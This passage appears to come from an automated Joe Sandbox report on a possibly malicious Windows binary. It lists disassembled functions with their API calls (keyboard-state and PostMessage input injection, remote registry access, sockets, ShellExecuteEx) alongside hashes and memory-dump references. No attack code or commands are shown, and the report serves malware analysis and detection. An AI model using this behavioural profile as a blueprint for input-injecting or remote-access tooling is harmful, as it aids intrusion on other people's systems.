                                                                                                                      • Instruction Fuzzy Hash: DD0136F2900218BFE721A794DD89FF7776CD708305F4045A6B746D2041EA749EC58B79
                                                                                                                      Function 00402A0A Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003ACAEE: _memmove.LIBCMT ref: 003ACB2F
                                                                                                                        • Part of subcall function 00403AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00402AA6,?,?), ref: 00403B0E
                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00402AE7
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BuffCharConnectRegistryUpper_memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3479070676-0
                                                                                                                      • Opcode ID: f329c16f79ce89a1d8bdef1b302e00fb4ee8ceb3dae6fa432f11c099f8af5441
                                                                                                                      • Instruction ID: a6705b5b3b52a4e7a009700e755b866282dd65019095b59c1729c167d5440c42
                                                                                                                      • Opcode Fuzzy Hash: f329c16f79ce89a1d8bdef1b302e00fb4ee8ceb3dae6fa432f11c099f8af5441
                                                                                                                      • Instruction Fuzzy Hash: 3A9199312042019FDB11EF14C995B6EB7E4FF88314F04892EF996AB2E1DB74E946CB46
                                                                                                                      Function 003F9A66 Relevance: 12.2, APIs: 8, Instructions: 247networkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • select.WS2_32 ref: 003F9B38
                                                                                                                      • WSAGetLastError.WS2_32(00000000), ref: 003F9B45
                                                                                                                      • __WSAFDIsSet.WS2_32(00000000,?), ref: 003F9B6F
                                                                                                                      • WSAGetLastError.WS2_32(00000000), ref: 003F9B9F
                                                                                                                      • htons.WS2_32(?), ref: 003F9C51
                                                                                                                      • inet_ntoa.WS2_32(?), ref: 003F9C0C
                                                                                                                        • Part of subcall function 003DE0F5: _strlen.LIBCMT ref: 003DE0FF
                                                                                                                        • Part of subcall function 003DE0F5: _memmove.LIBCMT ref: 003DE121
                                                                                                                      • _strlen.LIBCMT ref: 003F9CA7
                                                                                                                      • _memmove.LIBCMT ref: 003F9D10
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast_memmove_strlen$htonsinet_ntoaselect
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3637404534-0
                                                                                                                      • Opcode ID: 7ce185dc1daf8ad452b537191db74777bd7b672bd4f3aa05119b7ffc1b2ecc01
                                                                                                                      • Instruction ID: 2044c892228aa795638696e4edd2a95c1bbf4b8e83dcfe232f49c74efc1e1fa5
                                                                                                                      • Opcode Fuzzy Hash: 7ce185dc1daf8ad452b537191db74777bd7b672bd4f3aa05119b7ffc1b2ecc01
                                                                                                                      • Instruction Fuzzy Hash: 8B81AD72508204AFC716EF24DC45F6BBBA8EF85714F20462EF6559B2A1DB30DD04CBA2
                                                                                                                      Function 003CB72C Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __mtinitlocknum.LIBCMT ref: 003CB744
                                                                                                                        • Part of subcall function 003C8A0C: __FF_MSGBANNER.LIBCMT ref: 003C8A21
                                                                                                                        • Part of subcall function 003C8A0C: __NMSG_WRITE.LIBCMT ref: 003C8A28
                                                                                                                        • Part of subcall function 003C8A0C: __malloc_crt.LIBCMT ref: 003C8A48
                                                                                                                      • __lock.LIBCMT ref: 003CB757
                                                                                                                      • __lock.LIBCMT ref: 003CB7A3
                                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00456948,00000018,003D6C2B,?,00000000,00000109), ref: 003CB7BF
                                                                                                                      • RtlEnterCriticalSection.NTDLL(8000000C), ref: 003CB7DC
                                                                                                                      • RtlLeaveCriticalSection.NTDLL(8000000C), ref: 003CB7EC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1422805418-0
                                                                                                                      • Opcode ID: 1aaa9a710f28f41784d1149af331ed0202c1ff5f6769a190ac966c019b74ee02
                                                                                                                      • Instruction ID: 161ef2561d5aaa50f0c0c4a67863d1ab2d7d0c183370950b06ec74495b64e8df
                                                                                                                      • Opcode Fuzzy Hash: 1aaa9a710f28f41784d1149af331ed0202c1ff5f6769a190ac966c019b74ee02
                                                                                                                      • Instruction Fuzzy Hash: B34126B1E003159BEB129F68D846B69F7A8BF40325F11822CE825EB2D1DBB49D05CB95
                                                                                                                      Function 003EA1B7 Relevance: 12.1, APIs: 8, Instructions: 100fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 003EA1CE
                                                                                                                        • Part of subcall function 003C010A: std::exception::exception.LIBCMT ref: 003C013E
                                                                                                                        • Part of subcall function 003C010A: __CxxThrowException@8.LIBCMT ref: 003C0153
                                                                                                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 003EA205
                                                                                                                      • RtlEnterCriticalSection.NTDLL(?), ref: 003EA221
                                                                                                                      • _memmove.LIBCMT ref: 003EA26F
                                                                                                                      • _memmove.LIBCMT ref: 003EA28C
                                                                                                                      • RtlLeaveCriticalSection.NTDLL(?), ref: 003EA29B
                                                                                                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 003EA2B0
                                                                                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 003EA2CF
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 256516436-0
                                                                                                                      • Opcode ID: e7b1f04df8d24ae243b3abbb772f8b19bfa24178ff5b8dae9c2f7b8a5d092294
                                                                                                                      • Instruction ID: 97bf13d15fcccf87951064bbb2be65e516148f69db4d8e0fe9d4a0b134423cc2
                                                                                                                      • Opcode Fuzzy Hash: e7b1f04df8d24ae243b3abbb772f8b19bfa24178ff5b8dae9c2f7b8a5d092294
                                                                                                                      • Instruction Fuzzy Hash: 7331AF31A00205EBCB11DFA5DC85EAEBBB8EF44310B1481B9F904EB296D770DE15CBA5
                                                                                                                      Function 003F1BFA Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 308COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003A84A6: __swprintf.LIBCMT ref: 003A84E5
                                                                                                                        • Part of subcall function 003A84A6: __itow.LIBCMT ref: 003A8519
                                                                                                                        • Part of subcall function 003A3BCF: _wcscpy.LIBCMT ref: 003A3BF2
                                                                                                                      • _wcstok.LIBCMT ref: 003F1D6E
                                                                                                                      • _wcscpy.LIBCMT ref: 003F1DFD
                                                                                                                      • _memset.LIBCMT ref: 003F1E30
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                                                      • String ID: X$t:Ep:E
                                                                                                                      • API String ID: 774024439-2014670428
                                                                                                                      • Opcode ID: aa3cb23045d5d36a44b183b4d43789b881266284c36eef1f77b3021fd9b21900
                                                                                                                      • Instruction ID: 5bbafbd963e99b0c35957a4455b84434a81e1501f2ba6702beb34de008a9a032
                                                                                                                      • Opcode Fuzzy Hash: aa3cb23045d5d36a44b183b4d43789b881266284c36eef1f77b3021fd9b21900
                                                                                                                      • Instruction Fuzzy Hash: A4C16F31508304DFC756EF24D881A6AB7E4FF86310F10492DF99A9B2A2DB70ED05CB92
                                                                                                                      Function 003BB40F Relevance: 10.7, APIs: 7, Instructions: 218COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: fafbc6bf9a500fae203c842332f2a7f21cad97bf0cb6598f2b5209d866d3a435
                                                                                                                      • Instruction ID: 955d864d74459f94678a646d8f3556c8130303f979f5ed408cd8e6c3c3a44394
                                                                                                                      • Opcode Fuzzy Hash: fafbc6bf9a500fae203c842332f2a7f21cad97bf0cb6598f2b5209d866d3a435
                                                                                                                      • Instruction Fuzzy Hash: 6C719C70A00109EFCB15CF99CC48AFEBB78FF85318F148159FA55AA651CB749A42CF64
                                                                                                                      Function 00402121 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 0040214B
                                                                                                                      • _memset.LIBCMT ref: 00402214
                                                                                                                      • ShellExecuteExW.SHELL32(?), ref: 00402259
                                                                                                                        • Part of subcall function 003A84A6: __swprintf.LIBCMT ref: 003A84E5
                                                                                                                        • Part of subcall function 003A84A6: __itow.LIBCMT ref: 003A8519
                                                                                                                        • Part of subcall function 003A3BCF: _wcscpy.LIBCMT ref: 003A3BF2
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00402320
                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 0040232F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                                                                                      • String ID: @
                                                                                                                      • API String ID: 4082843840-2766056989
                                                                                                                      • Opcode ID: 64fdd9721f2f04feeb49dbea250951145bcb7c17b1c7305338cb9a2f53773507
                                                                                                                      • Instruction ID: b4e61b3eb58128385315b0eb50a4bf877e25d67913fac850f809867ddb40f2e1
                                                                                                                      • Opcode Fuzzy Hash: 64fdd9721f2f04feeb49dbea250951145bcb7c17b1c7305338cb9a2f53773507
                                                                                                                      • Instruction Fuzzy Hash: F8719A71A00619DFCB15EFA4C9859AEB7F5FF49310B00806AE856BB391DB74AD40CB94
                                                                                                                      Function 003E47DE Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetParent.USER32(?), ref: 003E481D
                                                                                                                      • GetKeyboardState.USER32(?), ref: 003E4832
                                                                                                                      • SetKeyboardState.USER32(?), ref: 003E4893
                                                                                                                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 003E48C1
                                                                                                                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 003E48E0
                                                                                                                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 003E4926
                                                                                                                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 003E4949
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 87235514-0
                                                                                                                      • Opcode ID: 7c0e638afdcfadf16ceba29c085fdbbc07dc677542fb27010d8bc46a7d30fcc4
                                                                                                                      • Instruction ID: 0a58ebbbd2b1939a9f600990be51d6d81938d5f335b9b626c12488e53d0aa514
                                                                                                                      • Opcode Fuzzy Hash: 7c0e638afdcfadf16ceba29c085fdbbc07dc677542fb27010d8bc46a7d30fcc4
                                                                                                                      • Instruction Fuzzy Hash: EC51D3A0A087E53DFB3746368C45BBBBEA95B0A304F098689F1D5568C3C7D9EC84D750
                                                                                                                      Function 003E45F9 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetParent.USER32(00000000), ref: 003E4638
                                                                                                                      • GetKeyboardState.USER32(?), ref: 003E464D
                                                                                                                      • SetKeyboardState.USER32(?), ref: 003E46AE
                                                                                                                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 003E46DA
                                                                                                                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 003E46F7
                                                                                                                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 003E473B
                                                                                                                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 003E475C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 87235514-0
                                                                                                                      • Opcode ID: 7e01643ee95f628d820db49745eac38456d5a80d09d471ebde7d8cb5aa2df060
                                                                                                                      • Instruction ID: 78460651b76cbd2201b082659cb94f663540ea521be1b4014cb8558f56823c80
                                                                                                                      • Opcode Fuzzy Hash: 7e01643ee95f628d820db49745eac38456d5a80d09d471ebde7d8cb5aa2df060
                                                                                                                      • Instruction Fuzzy Hash: F75118A0A047E67DFB3787368C45BB6BF995B0B304F094688E1E54A8C2D3D4EC98D790
                                                                                                                      Function 003E86AE Relevance: 10.6, APIs: 7, Instructions: 137timeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcsncpy$LocalTime
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2945705084-0
                                                                                                                      • Opcode ID: 90b3136bedeb15323bd7a7857281eaab120f648a4007ab232223ba0504b95b37
                                                                                                                      • Instruction ID: 7659612a4146a826e6661a052c7725ab4bec09057c8f1c6bb182922f26997ab1
                                                                                                                      • Opcode Fuzzy Hash: 90b3136bedeb15323bd7a7857281eaab120f648a4007ab232223ba0504b95b37
                                                                                                                      • Instruction Fuzzy Hash: 73419465C1026475CF12EBF4CC86ECFB7BC9F05710F50896AE918F7161EA30E65087A5
                                                                                                                      Function 0040CB07 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 129COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @U=u
                                                                                                                      • API String ID: 0-2594219639
                                                                                                                      • Opcode ID: ea5c76a2ad427c432e46b3d04aad2a8a78f29547b5ef43971a3114128f7d5884
                                                                                                                      • Instruction ID: 37b5241eb7fa371d69f3968c62fab2d5fa450790797d0ef2841628236be62084
                                                                                                                      • Opcode Fuzzy Hash: ea5c76a2ad427c432e46b3d04aad2a8a78f29547b5ef43971a3114128f7d5884
                                                                                                                      • Instruction Fuzzy Hash: 1741D035E04104EBD724DB28DC89FAABB79EB09320F154376E919B72E1C778AE01D658
                                                                                                                      Function 003E16F1 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003E1734
                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003E175A
                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 003E175D
                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 003E177B
                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 003E1784
                                                                                                                      • StringFromGUID2.COMBASE(?,?,00000028), ref: 003E17A9
                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 003E17B7
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3761583154-0
                                                                                                                      • Opcode ID: d26ecee4128f2832599080ce14beea358a3f3054534adab2ea150fa88448041d
                                                                                                                      • Instruction ID: be958c754edeab922f457ce7c9548c3cf748b43f2e4fc88baa1aa79239f98a3c
                                                                                                                      • Opcode Fuzzy Hash: d26ecee4128f2832599080ce14beea358a3f3054534adab2ea150fa88448041d
                                                                                                                      • Instruction Fuzzy Hash: 3F21A176700269AF9B11AFA9CC88CFF73EDEB09760B418225F915DB290DB70EC418764
                                                                                                                      Function 003DC600 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 93windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003ACAEE: _memmove.LIBCMT ref: 003ACB2F
                                                                                                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 003DC684
                                                                                                                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 003DC697
                                                                                                                      • SendMessageW.USER32(?,00000189,?,00000000), ref: 003DC6C7
